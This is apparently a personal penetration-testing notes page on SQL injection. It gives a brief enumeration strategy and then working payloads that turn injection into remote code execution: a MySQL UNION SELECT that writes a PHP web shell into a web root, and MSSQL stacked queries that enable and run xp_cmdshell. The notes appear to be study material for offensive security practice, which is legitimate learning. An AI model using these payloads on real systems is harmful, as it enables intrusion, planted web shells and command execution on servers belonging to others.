SQL injection

The strategy:

Depending on database try shells
Enumerate databases
Enumerate tables
ENumerate columns
money
Do this if its an unknown CMS and you see a parameter that the user can type. You need to get better at this Fabian.

Different ways to turn SQL injection to RCE:

##MYSQL##
' UNION SELECT ("<?php echo passthru($_GET['cmd']);") INTO OUTFILE 'C:/xampp/htdocs/command.php'  -- -' 

or 
##MSSQL##
 ';exec master..xp_cmdshell 'whoami'; --
 
Try enabling it like:
';EXEC sp_configure 'show advanced options', 1; -- 
';RECONFIGURE; -- 
';EXEC sp_configure 'xp_cmdshell', 1; --
';RECONFIGURE; --

Here is a great resource for SQLinjection:

SQLRowbot's PenTest Notes

PreviousLogin Portal Strat NextLocal File Inclusion

Last updated 2 years ago